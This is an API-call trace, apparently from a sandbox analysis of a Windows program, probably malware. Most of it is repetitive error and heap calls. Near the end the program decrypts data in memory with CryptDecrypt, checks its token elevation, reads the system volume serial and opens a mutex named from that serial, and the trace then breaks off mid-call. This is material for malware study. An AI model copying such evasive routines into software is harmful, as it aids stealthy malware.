[0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.371] SetLastError (dwErrCode=0x0) [0134.371] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.372] SetLastError (dwErrCode=0x0) [0134.372] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.373] GetLastError () returned 0x0 [0134.373] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.374] SetLastError (dwErrCode=0x0) [0134.374] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.375] SetLastError (dwErrCode=0x0) [0134.375] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x5c) returned 0x26a1768 [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.376] GetLastError () returned 0x0 [0134.376] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.377] SetLastError (dwErrCode=0x0) [0134.377] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.378] SetLastError (dwErrCode=0x0) [0134.378] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.379] SetLastError (dwErrCode=0x0) [0134.379] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.380] GetLastError () returned 0x0 [0134.380] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.381] SetLastError (dwErrCode=0x0) [0134.381] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.382] SetLastError (dwErrCode=0x0) [0134.382] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] GetLastError () returned 0x0 [0134.383] SetLastError (dwErrCode=0x0) [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x94) returned 0x26a17d0 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1f) returned 0x26a1870 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x28) returned 0x26a1898 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x37) returned 0x26a18c8 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x3c) returned 0x26a1908 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x31) returned 0x26a1950 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x14) returned 0x26a1990 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x24) returned 0x26a19b0 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0xd) returned 0x26a19e0 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x17) returned 0x26a19f8 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x2b) returned 0x26a1a18 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x15) returned 0x26a1a50 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x17) returned 0x26a1a70 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x22) returned 0x26a1a90 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0xe) returned 0x26a1ac0 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0xc1) returned 0x26a1ad8 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x3e) returned 0x26a1ba8 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1b) returned 0x26a1bf0 [0134.383] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1d) returned 0x26a1c18 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x48) returned 0x26a1c40 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x12) returned 0x26a1c90 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x18) returned 0x26a1cb0 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1b) returned 0x26a1cd0 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x24) returned 0x26a1cf8 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x29) returned 0x26a1d28 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1d60 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x6b) returned 0x26a1d88 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x17) returned 0x26a1e00 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0xf) returned 0x26a1e20 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x16) returned 0x26a1e38 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x28) returned 0x26a1e58 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x27) returned 0x26a1e88 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x12) returned 0x26a1eb8 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x21) returned 0x26a1ed8 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x10) returned 0x26a1f08 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1c) returned 0x26a1f20 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x12) returned 0x26a1f48 [0134.384] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a0fd0 | out: hHeap=0x26a0000) returned 1 [0134.384] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0134.384] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x80) returned 0x26a0fd0 [0134.384] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x11581f6) returned 0x0 [0134.385] RtlSizeHeap (HeapHandle=0x26a0000, Flags=0x0, MemoryPointer=0x26a0fd0) returned 0x80 [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.385] SetLastError (dwErrCode=0x0) [0134.385] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.386] SetLastError (dwErrCode=0x0) [0134.386] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.387] GetLastError () returned 0x0 [0134.387] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetLastError () returned 0x0 [0134.388] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.389] SetLastError (dwErrCode=0x0) [0134.389] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.478] SetLastError (dwErrCode=0x0) [0134.478] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.479] GetLastError () returned 0x0 [0134.479] SetLastError (dwErrCode=0x0) [0134.480] GetLastError () returned 0x0 [0134.480] SetLastError (dwErrCode=0x0) [0134.480] GetLastError () returned 0x0 [0134.480] SetLastError (dwErrCode=0x0) [0134.480] CryptAcquireContextW (in: phProv=0x115fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x115fcf0*=0xa968b8) returned 1 [0134.489] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f8b8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f920 | out: phKey=0x98f920*=0xaa9010) returned 1 [0134.489] CryptSetKeyParam (hKey=0xaa9010, dwParam=0x1, pbData=0x98f908, dwFlags=0x0) returned 1 [0134.489] CryptDecrypt (in: hKey=0xaa9010, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a11d8, pdwDataLen=0x98f8d4 | out: pbData=0x26a11d8, pdwDataLen=0x98f8d4) returned 1 [0134.489] CryptDestroyKey (hKey=0xaa9010) returned 1 [0134.489] GetTickCount () returned 0xf414 [0134.491] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1c) returned 0x26a1218 [0134.491] GetVersion () returned 0x23f00206 [0134.491] GetCurrentProcess () returned 0xffffffff [0134.491] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x98f92c | out: TokenHandle=0x98f92c*=0x1f0) returned 1 [0134.491] GetTokenInformation (in: TokenHandle=0x1f0, TokenInformationClass=0x14, TokenInformation=0x98f924, TokenInformationLength=0x4, ReturnLength=0x98f928 | out: TokenInformation=0x98f924, ReturnLength=0x98f928) returned 1 [0134.491] CloseHandle (hObject=0x1f0) returned 1 [0134.491] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a1240 [0134.491] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f820, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f888 | out: phKey=0x98f888*=0xaa9610) returned 1 [0134.491] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x98f870, dwFlags=0x0) returned 1 [0134.491] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f83c | out: pbData=0x26a1240, pdwDataLen=0x98f83c) returned 1 [0134.491] CryptDestroyKey (hKey=0xaa9610) returned 1 [0134.491] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x1e) returned 0x26a1268 [0134.491] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x1e) returned 0x26a1290 [0134.491] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x90) returned 0x26a12b8 [0134.491] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f7f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f860 | out: phKey=0x98f860*=0xaa9450) returned 1 [0134.491] CryptSetKeyParam (hKey=0xaa9450, dwParam=0x1, pbData=0x98f848, dwFlags=0x0) returned 1 [0134.491] CryptDecrypt (in: hKey=0xaa9450, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a12b8, pdwDataLen=0x98f814 | out: pbData=0x26a12b8, pdwDataLen=0x98f814) returned 1 [0134.491] CryptDestroyKey (hKey=0xaa9450) returned 1 [0134.491] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a12b8 | out: hHeap=0x26a0000) returned 1 [0134.491] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x26a1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.491] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1290 | out: hHeap=0x26a0000) returned 1 [0134.491] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0134.491] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x98f8c8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x98f8c8*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.492] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1268 | out: hHeap=0x26a0000) returned 1 [0134.492] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x40) returned 0x26a1240 [0134.492] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f854, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f8bc | out: phKey=0x98f8bc*=0xaa9610) returned 1 [0134.492] CryptSetKeyParam (hKey=0xaa9610, dwParam=0x1, pbData=0x98f8a4, dwFlags=0x0) returned 1 [0134.492] CryptDecrypt (in: hKey=0xaa9610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a1240, pdwDataLen=0x98f870 | out: pbData=0x26a1240, pdwDataLen=0x98f870) returned 1 [0134.492] CryptDestroyKey (hKey=0xaa9610) returned 1 [0134.492] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x8, Size=0x34) returned 0x26a1288 [0134.492] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x1f0 [0134.492] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x102 [0134.492] CloseHandle (hObject=0x1f0) returned 1 [0134.492] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1240 | out: hHeap=0x26a0000) returned 1 [0134.492] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a1288 | out: hHeap=0x26a0000) returned 1 [0134.492] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x20) returned 0x26a1240 [0134.492] CryptImportKey (in: hProv=0xa968b8, pbData=0x98f834, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x98f89c | out: phKey=0x98f89c*=0xaa91d0) returned 1 [0134.492] CryptSetKeyParam (hKey=0xaa91d0, dwParam=0x1, pbData=0x98f884, dwFlags=0x0) returned 1 [0134.492] CryptDecrypt (in: hKey=0xaa91d0, hHash=0x0, Final=0, 